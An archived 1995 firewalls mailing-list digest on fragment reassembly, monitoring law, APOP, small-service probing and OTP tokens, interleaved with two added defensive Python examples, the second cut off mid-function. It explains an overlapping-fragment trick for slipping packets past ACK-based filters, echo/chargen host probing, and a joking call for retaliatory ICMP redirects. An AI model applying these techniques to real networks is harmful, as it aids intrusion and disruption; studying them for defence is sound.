Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > No argument, but RFC 791 says "Every internet module must be able to
> > forward a datagram of 68 octets without further fragmentation", so it
> > should always be safe to toss fragments smaller than that.
>
> What about final fragments ? But then they won't have IP_MF set..
You're right; IP can't fragment them, but can't discard them either. This would probably require some kind of data-link layer fragmentation, with reassembly at the next hop (rather than the final destination).

> > If the reassembly algorithm was broken (like RFC 791's), it could be
> > exploited by cooking up two overlapping fragments: one having a complete
> > TCP header harmless enough to get through the firewall (for example ACK=1
> > to get through an "established" filter), and the second fragment beginning
> > in the middle of the TCP header, overwriting the flags to set ACK=0, to
>
> Bingo.
>
> 815 fills holes. A hole is where there is no data.

But that's not enough. If I send the second fragment first, the "hole" will only include the first 8 bytes of the TCP header. When the fragment with offset=0 arrives later, the flags won't be dropped into the hole, and the reassembled packet will have ACK=0.

If fragments arrive out-of-order, the one with the lower fragment-offset always has to take precedence, even if it means overwriting part of a fragment that arrived earlier.

--
Tom Fitzgerald   1-508-967-5278   Wang Labs, Lowell MA, USA   fitz@wang.com

From firewalls-owner Thu May 11 11:14:27 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA21172 for firewalls-outgoing; Thu, 11 May 1995 09:39:30 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA21157 for ; Thu, 11 May 1995 09:39:24 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA26921; Thu, 11 May 95 12:22:19 -0400
Date: Thu, 11 May 95 12:22:18 -0400
Message-Id: <9505111622.AA26921@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E.
Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Liable for security (monitoring E-Mail)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>> You could go so far as to scan outgoing material (e-mail, usenet,
>> etc.) for outgoing offensive material.

>I think that the electronic privacy act of 1988 protects people in the US
>against searches of email that are going to or coming from an external
>network..

Three comments on this (consult your local shyster, I isn't one):

1) If the corporation/agency/etc requires a signed statement acknowledging that "all communications on the network are subject to monitoring and inappropriate material may be returned" as a condition of use, the privacy act would not cover since there would be a "quid pro quo". The US Department of Justice even prepared a formal statement that could be used a couple of years ago (about half a screenful) for that purpose. So far as I know the only people who have been taken to court (e.g. Epson) were companies that did not announce the fact that they were monitoring.

Does not mean that companies that do not *want* to monitor for fear that they will find something will have to (that is what Exon's bill tried to do) but to say that an owner *cannot* monitor his own equipment would be a violation of fundamental property rights and that ain't going to happen here. Yet.

2) Headers may routinely be examined for packet type, source and destination without any warning, is considered the same as looking at the outside of an envelope without opening it.

3) Would not be surprised to find a decision come down that "there is no expectation of privacy on the Internet" - RFC 1281 effectively says that anyway.
Warmly, Padgett

From firewalls-owner Thu May 11 11:26:54 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA23626 for firewalls-outgoing; Thu, 11 May 1995 10:57:14 -0700 Received: from RUTADMIN.Rutgers.Edu (rutadmin.rutgers.edu [128.6.184.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA23618 for ; Thu, 11 May 1995 10:57:09 -0700 Message-Id: <199505111757.KAA23618@miles.greatcircle.com> Received: from RUTADMIN.BITNET by RUTADMIN.Rutgers.Edu (IBM MVS SMTP V2R2.1) with BSMTP id 5031; Thu, 11 May 95 13:56:56 EST Date: Thu, 11 May 95 13:56 EDT To: Firewalls Discussion List From: Nick Di Giovanni Subject: Re: Liable for Security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

A good book to consult for legal guidance is NETLAW by attorney Lance Rose. This is an updated version of the book originally called SYSLAW. Sorry but I don't have the ISBN or publisher's name handy. Regards, Nick Di Giovanni Rutgers University

From firewalls-owner Thu May 11 11:45:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA24612 for firewalls-outgoing; Thu, 11 May 1995 11:18:41 -0700 Received: from seraph.uunet.ca (uunet.ca [142.77.1.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA24606 for ; Thu, 11 May 1995 11:18:38 -0700 Received: from fujitsu.ca ([142.77.30.2]) by mail.uunet.ca with SMTP id <173472-8>; Thu, 11 May 1995 14:16:38 -0400 Received: by fujitsu.ca (4.1/SMI-4.1) id AA11269; Thu, 11 May 95 14:14:55 EDT Received: from falcon.fujitsu.ca(192.10.1.205) by jay via smap (V1.3) id sma011267; Thu May 11 14:14:26 1995 Received: by falcon (4.1/SMI-4.1) id AA11257; Thu, 11 May 95 14:14:11 EDT Date: Thu, 11 May 1995 14:14:11 -0400 From: rajani@fujitsu.ca (Rajani Ramkaran) Message-Id: <9505111814.AA11257@falcon> To: firewalls@greatcircle.com Subject: Review of different firewall products Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi Has anyone come
across any articles that review the various firewall products for eg. . how does Gauntlet compare to FireWall-1, to.. DEC's product .. etc.. I have come across articles that review the various firewall technologies.. i.e. application gateway vs packet .. But what I am looking for is an actual product review Thanks Rajani INTERNET: rajani@fujitsu.ca

From firewalls-owner Thu May 11 12:06:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA23867 for firewalls-outgoing; Thu, 11 May 1995 11:01:41 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA23857 for ; Thu, 11 May 1995 11:01:36 -0700 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via SMTP; Thu, 11 May 1995 14:01:58 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.7) id AA12121; Thu, 11 May 1995 14:01:56 -0400 Date: Thu, 11 May 1995 14:01:56 -0400 From: long-morrow@CS.YALE.EDU (H Morrow Long) Message-Id: <199505111801.AA12121@SPARKY.CF.CS.YALE.EDU> To: firewalls@greatcircle.com, lyndond@roverpte.demon.co.uk Subject: Re: apop Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

lyndond@roverpte.demon.co.uk wrote:
>I am looking at logging in via pop3 from
>across the net. Obviously I don't want to
>use the standard pop3 as this sends the
>password in plain text, what I do want is
>to use one time passwords, preferably S/Key.
>I have heard about apop which does one time
>passwords for pop3 and can be used with
>Eudora. A search of archie only revealed
>add ons for the mac eudora and no sign
>of a server. Can anyone tell me if this
>is available for the PC version and where
>I can get the server from ?

The pop server (popd) that comes with the MH 6.8 distribution contains #defines and code for APOP. You can get the MH 6.8 distribution from a few places around the net.
I scanned the code of the Berkeley "popper" POP server but didn't see any references or code for APOP mode in it. - Morrow

From firewalls-owner Thu May 11 12:09:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA24551 for firewalls-outgoing; Thu, 11 May 1995 11:17:26 -0700 Received: from Disclosure.COM (di.disclosure.com [199.97.230.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA24545 for ; Thu, 11 May 1995 11:17:21 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA13636; Thu, 11 May 95 14:20:21 EDT Date: Thu, 11 May 1995 14:20:20 -0400 (EDT) From: Scott Barman To: firewalls@GreatCircle.com Subject: Requesting "echo" Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Unfortunately, I deleted the postings showing someone with screend blocking an echo UDP request. I had an interesting thought... Many have been setting up firewalls to block ICMP packets for their internal network (inbound and outbound). What if someone knows a little about your network and wants to see if the system exists? They can't use ping because the ICMP will be rejected. So why not try to use a real port that does nothing but is built into nearly every inetd there is? Why not use echo (port 7) or chargen (19) to see if one could get a response out of a system? I can see using it when there may be a likelihood that I may not get a response from the ping.

This leads to a couple of questions:
1) How many people are filtering things like echo or chargen at the firewall or router?
2) How should a firewall respond when it receives a request for one of these services and they are being denied?
scott barman scott@disclosure.com From firewalls-owner Thu May 11 12:09:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26757 for firewalls-outgoing; Thu, 11 May 1995 12:07:28 -0700 Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA26750 for ; Thu, 11 May 1995 12:07:25 -0700 Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id PAA02640 for ; Thu, 11 May 1995 15:08:03 -0400 Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA08364; Thu, 11 May 95 15:06:50 EDT Date: Thu, 11 May 95 15:06:50 EDT Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: Gobbler Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A while back, Christopher Klaus (cklaus@iss.net) posted a FAQ file on Sniffers. He noted that the Gobbler sniffer is available for DOS machines. Does anyone know where this is available on the Internet (e.g., FTP site)? I did ask Christopher, but he did not have a location. 
-Brian From firewalls-owner Thu May 11 13:15:15 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA28523 for firewalls-outgoing; Thu, 11 May 1995 13:01:13 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA28517 for ; Thu, 11 May 1995 13:01:10 -0700 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via SMTP; Thu, 11 May 1995 16:01:37 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.7) id AA12521; Thu, 11 May 1995 16:01:34 -0400 Date: Thu, 11 May 1995 16:01:34 -0400 From: long-morrow@CS.YALE.EDU (H Morrow Long) Message-Id: <199505112001.AA12521@SPARKY.CF.CS.YALE.EDU> To: firewalls@GreatCircle.com, scott@Disclosure.COM Subject: Re: Requesting "echo" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk scott@disclosure.com wrote: >I had an interesting thought... Many have been setting up firewalls to >block ICMP packets for their internal network (inbound and outbound). >What if someone knows a little about your network and wants to see if >the system exists? They can't use ping because the ICMP will be >rejected. So why not try to use a real port that does nothing but >is built into nearly every inetd there is? > >Why not use echo (port 7) or chargen (19) to see if one could get a >response out of a system? I can see using it when there may be a >likelihood that I may not get a response from the ping. > >This leads to a couple of questions: >1) How many people are filtering things like echo or chargen at the >firewall or router? Most people who are filtering out ICMP protocol messages are probably filtering out most if not all UDP traffic as well -but there are also TCP versions of these "little services" which are often handled internally by modern inetds. >2) How should a firewall respond when it receives a request for one of >these services and they are being denied? o Log it. 
o Notify network administration via E-Mail, pager, etc.
o Take pro-active defense measures such as send its own nasty ICMP messages (such as ICMP network unreachables and redirects for net 0 ) back to the source :-)

- Morrow

From firewalls-owner Thu May 11 14:09:21 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29397 for firewalls-outgoing; Thu, 11 May 1995 13:51:51 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA29392 for ; Thu, 11 May 1995 13:51:48 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA03846; Thu, 11 May 1995 16:52:20 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA25866; Thu, 11 May 1995 16:52:15 -0400 Message-Id: <9505112052.AA25866@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: rajani@fujitsu.ca (Rajani Ramkaran), firewalls@greatcircle.com Date: Thu, 11 May 1995 16:52:04 -0500 Subject: Re: Review of different firewall products Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On 11 May 95 at 14:14, Rajani Ramkaran was heard to utter:
> Hi
>
> Has anyone come across any articles that review the various firewall
> products
>
> for eg. . how does Gauntlet compare to FireWall-1, to.. DEC's product ..
> etc..
>
> I have come across articles that review the various firewall
> technologies.. i.e. application gateway vs packet ..
>
> But what I am looking for is an actual product review

Check out the March 6/95 issue of Network World. Not complete, IMHO, but it's there, FWIW. -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## If you like this sort of thing, ## ## this is the sort of thing you'll like.
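Taking the echo/chargen exchange above (Scott Barman's question and Morrow Long's first answer, "log it") one step further: here is an added example, not code from any message in this digest, that reads filter-log deny/permit lines and flags a source that aimed at the small services on several internal addresses, which is the reachability sweep Scott describes. The log format, the addresses and hostnames in SAMPLE_LOG, and the three-target threshold are constructed for the example; the regular expression would need adapting to a real router's or screend's log format.

```python
"""Spotting echo/chargen reachability probes in filter logs.

Added example, not from any message in this digest.  Given the deny/permit
lines a filtering router or screend-style host writes, it groups hits on the
"little services" (TCP or UDP 7/9/13/19) by source address and flags a
source that touched several internal addresses that way: a ping substitute
used once the firewall started dropping ICMP.  The log format and the
sample lines are constructed for this example.
"""
import re
from collections import defaultdict

SMALL_SERVICES = {7: "echo", 9: "discard", 13: "daytime", 19: "chargen"}

# Constructed format: "<syslog ts> <host> filter: <deny|permit> <proto> src:port -> dst:port"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) filter: "
    r"(?P<action>deny|permit) (?P<proto>tcp|udp) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample: one outside host walking part of a /24 on ports 7 and 19
# after its pings were dropped, an unrelated single echo, and a permitted SMTP
# session that must not be counted.
SAMPLE_LOG = """\
May 11 14:20:01 gw filter: deny udp 192.0.2.45:1033 -> 10.1.2.1:7
May 11 14:20:01 gw filter: deny tcp 192.0.2.45:1034 -> 10.1.2.1:7
May 11 14:20:02 gw filter: deny tcp 192.0.2.45:1035 -> 10.1.2.2:7
May 11 14:20:02 gw filter: deny tcp 192.0.2.45:1036 -> 10.1.2.3:19
May 11 14:20:03 gw filter: deny tcp 192.0.2.45:1037 -> 10.1.2.4:7
May 11 14:20:09 gw filter: permit tcp 198.51.100.7:2201 -> 10.1.2.25:25
May 11 14:20:11 gw filter: deny tcp 198.51.100.9:1500 -> 10.1.2.1:7
"""


def parse_line(line: str):
    """Return the parsed fields as a dict with numeric ports, or None for a
    line that does not match (in a real deployment such lines should be
    counted and reported, not silently ignored)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
    return rec


def small_service_hits(lines):
    """Map source address -> sorted list of (dst, proto, service) for every
    packet, denied or permitted, aimed at a small-service port.  Permitted
    hits matter too: they mean an inetd somewhere inside answered."""
    hits = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["dport"] in SMALL_SERVICES:
            hits[rec["src"]].add((rec["dst"], rec["proto"], SMALL_SERVICES[rec["dport"]]))
    return {src: sorted(targets) for src, targets in hits.items()}


def find_sweeps(lines, min_targets: int = 3):
    """Sources that probed at least min_targets distinct internal addresses
    via the small services, i.e. a host-discovery sweep rather than a stray
    packet.  Returns {src: sorted list of destination addresses}."""
    sweeps = {}
    for src, targets in small_service_hits(lines).items():
        distinct = {dst for dst, _, _ in targets}
        if len(distinct) >= min_targets:
            sweeps[src] = sorted(distinct)
    return sweeps


if __name__ == "__main__":
    for src, dsts in find_sweeps(SAMPLE_LOG.splitlines()).items():
        print(f"{src} swept {len(dsts)} hosts via small services: {', '.join(dsts)}")
```

Note that permitted hits on port 7 or 19 are collected as well as denied ones: a permit means some inetd inside answered, which is exactly the information the prober wanted. Whether to drop such packets silently or reject them is a policy choice; either way the source that touched several hosts is the one that should reach the notification path Morrow lists.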
##

From firewalls-owner Thu May 11 15:09:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00372 for firewalls-outgoing; Thu, 11 May 1995 14:43:41 -0700 Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA00367 for ; Thu, 11 May 1995 14:43:38 -0700 Received: from [198.115.177.208] (slip-0-8.shore.net) by northshore.ecosoft.com with SMTP id AA01448 (5.67a/IDA-1.5 for ); Thu, 11 May 1995 17:44:04 -0400 Message-Id: <199505112144.AA01448@northshore.ecosoft.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 10 May 1995 16:49:05 -0500 To: firewalls@greatcircle.com From: vin@shore.net (Vin McLellan) Subject: One Time Password Tokens Cc: Kare.Presttun@ansf.alcatel.fr Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Kare Presttun declared:
>The correct statement is that there are two classes of tokens,
>asynchronous and synchronous. The first one is what is called
>challenge response. The second category contains two technologies,
>time synchronous and history synchronous. The secure ID is time
>synchronous, and the new tokens from Enigma Logic can operate in
>both asynchronous and history synchronous mode (nice technology
>Bob). The history synchronous technology does not have the drawback
>that the password is valid within a time window.

With respect, this stuff about a "history synchronous" token is marketing gobbledygook. This is a repackaged technology Enigma first introduced on one of their big "squashed banana" tokens in the early 1980s and then withdrew -- I always thought -- because of its inherent security weaknesses. When cards became the rage, it came back. What we have here is a token which provides a sequential list of valid access codes upon demand. (Think of it as a Radio Shack version of the paper list of S/key codes you see guys pulling from their wallets at conventions.)
Codes can thus be loaned to friends (a common problem) or punched out in advance so as to avoid carrying the token. With this technology -- unlike Enigma's standard C/R token -- there is no requirement that the token be physically present when a valid access call is submitted to a server. (The whole idea behind a token is that -- as a tangible physical device required to implement the access process -- it can not be in more than one place at a time. This tech tosses the whole idea of a token into loonyland.) There are also some obvious potential problems in keeping the token's list and the server's list in synch. (In the original version, there was also a security issue in the way in which the server had to broaden the access window to search for a token out of sequential synch, but I forget the details.) Also, since you obviously can't feed a sequential list to more than one server, this is a one-machine logon device -- or, at least, it was with the original one-seed version. Enigma Logic makes several solid reliable products which perform as promised. I thought this one was a turkey ten years ago, and I think it is a turkey today. (Sorry, Bob;-) Anyone who thinks they can educate me, or otherwise convince me that this is not a dangerous, silly, insecure product is welcome to add their 2 cents. Suerte, _Vin -- Vin McLellan +The Privacy Guild+ USA Tel. (617) 884-5546 Mail: 53 Nichols St., Chelsea, Ma.
02150 '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''

From firewalls-owner Thu May 11 15:39:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA00751 for firewalls-outgoing; Thu, 11 May 1995 15:12:37 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA00741 for ; Thu, 11 May 1995 15:12:32 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA28354; Thu, 11 May 95 18:10:39 -0400 Date: Thu, 11 May 95 18:10:38 -0400 Message-Id: <9505112210.AA28354@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Gobbler Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Brian writes:
>Does anyone know where this is available on the Internet (e.g., FTP site)?

Have not looked for a while but last time I used ARCHIE to find it. The key is that GOBBLER is a companion to BEHOLDER and while ARCHIE will not find the first, it did find the other. You need both.
Warmly, Padgett From firewalls-owner Thu May 11 17:09:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA02431 for firewalls-outgoing; Thu, 11 May 1995 16:45:27 -0700 Received: from as0a.sei.cmu.edu (as0a.sei.cmu.edu [128.237.1.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA02425 for ; Thu, 11 May 1995 16:45:24 -0700 Received: from ig.sei.cmu.edu by as0a.sei.cmu.edu (8.6.9/3.00) id TAA02215; Thu, 11 May 1995 19:44:31 -0400 Received: from localhost.sei.cmu.edu by ig.sei.cmu.edu (8.6.10/3.00) id TAA00119; Thu, 11 May 1995 19:44:29 -0400 Message-Id: <199505112344.TAA00119@ig.sei.cmu.edu> To: Firewalls@GreatCircle.COM From: argus@SEI.CMU.EDU cc: argus@SEI.CMU.EDU Subject: Argus-1.5, network auditing/management/firewall tool Date: Thu, 11 May 1995 19:44:29 EDT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following is a release announcement of a new generic IP network transaction auditing tool named Argus. We have found that comprehensive network transaction auditing can be a powerful network management tool, and we think that a large number of sites can benefit from the prototype work that we have done in this area. We hope that you find Argus and the support tools helpful. If you have any questions, comments or suggestions please send mail to argus@sei.cmu.edu. --------- Argus 1.5 Software Engineering Institute Carnegie Mellon University argus@sei.cmu.edu ftp://ftp.sei.cmu.edu/pub/argus-1.5 This is to announce the availability of the public domain package, Argus, a generic IP network transaction auditing tool. Argus runs as an application level daemon, promiscuously reading network datagrams from a specified interface, and generates network traffic status records for the network activity that it encounters. Argus has been built and tested under SunOS 4.x, Solaris 2.3, and SGI IRIX5.2. The issue of portability has been principally addressed by the use of libpcap-0.0.x. 
Argus enables a site to generate comprehensive network transaction audit logs, in a fashion that provides for high degrees of data reduction, and high degrees of semantic preservation. This has allowed us to perform extensive analysis of our network traffic, historically. The package includes two example programs for analyzing the network transaction audit logs. By processing these historical network logs, we have been able to, among other things:

1. Verify that our network security access control policies are actually being enforced and detect attempts to break through our firewall and host based mechanisms.
2. Perform grade of service analysis for every IP based network service that is offered in our network infrastructure.
3. Identify and troubleshoot difficult transient network problems such as intermittent service failure, denial of service attacks and host and network configuration problems.

And by using the realtime features of Argus, we have been able to develop complex proactive network management tools. The data that Argus generates makes possible the ability to analyze network activity and performance in ways that have not been possible before. We are routinely answering questions such as:

"Has anyone scanned this subnet for system vulnerabilities, such as that performed by SATAN?"
"A new intrusion method has been discovered, has anyone tried to use it to attack the CERT Coordination Center's network in the past year?"
"Did a new MUD server appear on any of the SEI machines last Tuesday?"
"What network traffic was blocked by our router-enforced firewall?"
"What is the average HTTP transaction connection time when a CMU host accesses MIT's WWW server?"
"If we move the News server to another subnet, what other machines should be moved with it?"

Each of these questions can be answered from the same historical network activity audit log. Comprehensive network transaction auditing can make a major impact on a site's network security.
As we have had a great deal of success in using Argus to improve the network security at the Software Engineering Institute and CERT Coordination Center, we would like to emphasize this advantage of the use of Argus. We have found that comprehensive network transaction auditing can be a powerful network management tool, and we think that a large number of sites can benefit from the prototype work that we have done in this area. We hope that you find Argus and the support tools helpful. If you have any questions, comments or suggestions please send mail to argus@sei.cmu.edu. Again, thank you for your interest in Argus. Carter Bullard Software Engineering Institute Carnegie Mellon University wcb@sei.cmu.edu Chas DiFatta Software Engineering Institute Carnegie Mellon University chas@sei.cmu.edu

From firewalls-owner Thu May 11 18:09:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA03208 for firewalls-outgoing; Thu, 11 May 1995 17:49:12 -0700 Received: from gwosi.telesc.gov.br (gwosi.telesc.gov.br [200.18.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA03174 for ; Thu, 11 May 1995 17:46:38 -0700 Received: by gwosi.telesc.gov.br (AIX 3.2/UCB 5.64/4.03) id AA15160; Thu, 11 May 1995 21:45:25 -0500 Date: Thu, 11 May 1995 21:35:58 -0500 (CDT) From: Jane Ferreira Cunha Subject: Firewall & 6611 To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi, everyone! Does anybody have any experience in building a firewall with an IBM 6611 router? Has anybody any opinion about configuring filters in it? All comments are welcome. Thanx.
Jane Ferreira Cunha Telecommunications of Santa Catarina Brazil E-mail : jane@gwosi.telesc.gov.br

From firewalls-owner Thu May 11 19:13:00 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA04148 for firewalls-outgoing; Thu, 11 May 1995 18:55:15 -0700 Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA04138 for ; Thu, 11 May 1995 18:55:12 -0700 Received: from [204.57.49.92] by northshore.ecosoft.com with SMTP id AA21800 (5.67a/IDA-1.5 for ); Thu, 11 May 1995 21:55:38 -0400 Date: Thu, 11 May 1995 21:55:38 -0400 Message-Id: <199505120155.AA21800@northshore.ecosoft.com> X-Sender: jr@shore.net Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: rajani@fujitsu.ca (Rajani Ramkaran), firewalls@greatcircle.com From: jr@vc.com (Jonathan Roosevelt) Subject: Re: Review of different firewall products Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Rajani Ramkaran wrote on May 11:
>Hi
>
>Has anyone come across any articles that review the various firewall products
>
>for eg. . how does Gauntlet compare to FireWall-1, to.. DEC's product .. etc..
>
>I have come across articles that review the various firewall technologies..
>i.e. application gateway vs packet ..
>
>But what I am looking for is an actual product review
>
>Thanks
>
>Rajani
>
>INTERNET: rajani@fujitsu.ca

Try Internet Business Report, December 1994; Advanced Systems, December 1994; Interactive Age May 8, 1995. Could you direct me to the articles on various firewall technologies? The more basic the better. Thanks.
Jonathan Roosevelt Battery Ventures 200 Portland Street Boston, MA 02114 voice: (617)367-1011 fax: (617)367-1070 From firewalls-owner Thu May 11 21:39:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA07075 for firewalls-outgoing; Thu, 11 May 1995 21:25:12 -0700 Received: from mail.eworld.com (hp1.online.apple.com [192.215.65.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA07070 for ; Thu, 11 May 1995 21:25:09 -0700 From: Kodzo@eworld.com Received: by hp1.online.apple.com (1.37.109.16/16.2) id AA059982749; Thu, 11 May 1995 21:25:49 -0700 Date: Thu, 11 May 1995 21:25:49 -0700 Message-Id: <950511212547_10151095@eWorld.com> To: firewalls@greatcircle.com Subject: What do you think of Sidewinder? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anybody have an opinion about Sidewinder they care to share? [How easy was it to install (any holes turn-up?), how is support, would you consider the product again, etc. .....] 
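Returning to Tom Fitzgerald's message earlier in this digest on overlapping fragments and RFC 815 hole filling: the following is an added example, not code from any message here, that builds the two fragments he describes, reassembles them under the fill-only-holes policy in both arrival orders and under his lowest-offset-wins rule, and then shows the per-fragment check a filtering router can apply so that it does not have to trust the end host's reassembler. The TCP header builder, the port numbers and the 16-byte first-fragment minimum are this example's choices; the drop-offset-1 rule is the one RFC 1858 published later that year.

```python
"""Overlapping IP fragments versus an "established" packet filter.

Added example, not code from any message in this digest.  It models the
attack Tom Fitzgerald describes: fragment A (offset 0) carries a complete
TCP header with ACK set and therefore passes an ACK-only filter; fragment
B starts 8 bytes into the same header and rewrites the flags byte so ACK
is clear.  Which flags byte the end host sees depends on its reassembly
policy and on the order in which the fragments arrive.
"""
import struct
from dataclasses import dataclass

TCP_FLAG_SYN = 0x02
TCP_FLAG_ACK = 0x10
FLAGS_BYTE = 13           # offset of the flags byte inside the TCP header


@dataclass
class Fragment:
    offset: int           # byte offset into the original datagram payload (multiple of 8)
    data: bytes
    more: bool            # the MF bit


def tcp_header(sport: int, dport: int, flags: int, seq: int = 0, ack: int = 0) -> bytes:
    """Minimal 20-byte TCP header; checksum is left zero, it plays no part here."""
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 8192, 0, 0)


def passes_established_filter(packet: bytes) -> bool:
    """The filter rule under discussion: pass a TCP segment only if ACK is set."""
    return bool(packet[FLAGS_BYTE] & TCP_FLAG_ACK)


def reassemble_hole_filling(fragments):
    """RFC 815 style reassembly as Fitzgerald reads it: a hole is where no data
    has been stored yet, and a fragment only fills holes.  Bytes already
    present are never overwritten, whatever the offsets involved.
    Returns the datagram payload, or None while holes remain."""
    buf, filled, total = bytearray(), bytearray(), None
    for f in fragments:
        end = f.offset + len(f.data)
        if end > len(buf):
            buf.extend(bytes(end - len(buf)))
            filled.extend(bytes(end - len(filled)))
        for i, byte in enumerate(f.data):
            pos = f.offset + i
            if not filled[pos]:
                buf[pos] = byte
                filled[pos] = 1
        if not f.more:
            total = end           # the last fragment fixes the datagram length
    if total is None or not all(filled[:total]):
        return None
    return bytes(buf[:total])


def reassemble_lowest_offset_wins(fragments):
    """Fitzgerald's rule: the fragment with the lower offset takes precedence in
    any overlap, regardless of arrival order.  Processing the fragments in
    offset order with the same fill-only-holes copy gives exactly that, at
    the price of buffering every fragment before deciding."""
    return reassemble_hole_filling(sorted(fragments, key=lambda f: f.offset))


def firewall_should_drop(frag: Fragment, min_first_fragment: int = 16) -> bool:
    """Per-fragment checks a filtering router can apply without reassembling
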